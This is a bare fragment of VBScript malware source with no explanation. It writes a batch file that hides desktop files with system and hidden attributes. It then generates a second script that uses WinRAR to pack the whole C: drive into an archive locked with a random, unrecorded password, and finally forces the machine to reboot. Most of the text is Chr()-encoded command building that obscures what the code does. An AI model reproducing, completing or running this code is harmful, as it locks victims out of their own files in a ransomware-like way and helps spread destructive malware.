b.Writeline Chr(37)&i&Chr(37)&i&"20"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"21"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"22"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"23"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"24"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"25"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"26"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"27"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"28"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"29"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"30"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"31"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"32"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"33"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"34"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"35"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"36"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"37"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"38"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"39"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"40"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"41"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"42"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"43"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"44"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"45"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"46"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"47"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"48"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"49"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"50"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"51"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"52"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"53"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"54"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"55"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"56"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"57"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"58"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"59"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"60"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"61"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"62"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"63"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"64"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"65"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"66"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"67"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"68"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"69"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"70"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"71"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"72"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"73"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"74"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"75"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"76"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"77"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"78"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"79"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"80"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"81"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"82"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"83"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"84"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"85"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"86"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"87"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"88"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"89"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"90"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"91"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"92"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"93"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"94"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"95"&Chr(62)&"nul"
b.Writeline Chr(37)&i&Chr(37)&i&"96"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"97"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"98"&Chr(62)&"nul "&Chr(124)&" "&Chr(37)&i&Chr(37)&i&"99"&Chr(62)&"nul"
b.Writeline "for %%h in (%windir%\desktop\"&i&"*) do attrib +r +h +s +a %%h"
b.Writeline "echo.Randomize>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.Set a=CreateObject("&Chr(34)&"scripting.filesystemobject"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.c=Int((99999999*Rnd)+1)>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.d=Int((99999999*Rnd)+1)>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.Set b=a.CreateTextFile (d&"&Chr(34)&".bat"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.Set f=CreateObject("&Chr(34)&"WScript.Shell"&Chr(34)&")>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.e=Int((99999999*Rnd)+1)>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&"ctty nul"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&"if not exist c:\"&chr(37)&g&chr(37)&"winrar\rar.exe goto end"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&"c:\"&chr(37)&g&chr(37)&"winrar\rar.exe a -p"&Chr(34)&"&c&"&Chr(34)&" -r -m5 -o+ -inul -idp -y "&Chr(34)&"&e&"&Chr(34)&".rar c:\*.* "&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&"ctty con"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&":end"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Writeline "&Chr(34)&"cls"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.b.Close>>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "echo.f.Run "&"d"&Chr(38)&Chr(34)&".bat"&Chr(34)&">>%windir%\system\"&c&"\"&c&".vbs"
b.Writeline "cscript %windir%\system\"&c&"\"&c&".vbs"
b.Writeline "rundll32 shell32.dll,SHExitWindowsEx 2"
b.Writeline "cls"
b.Close
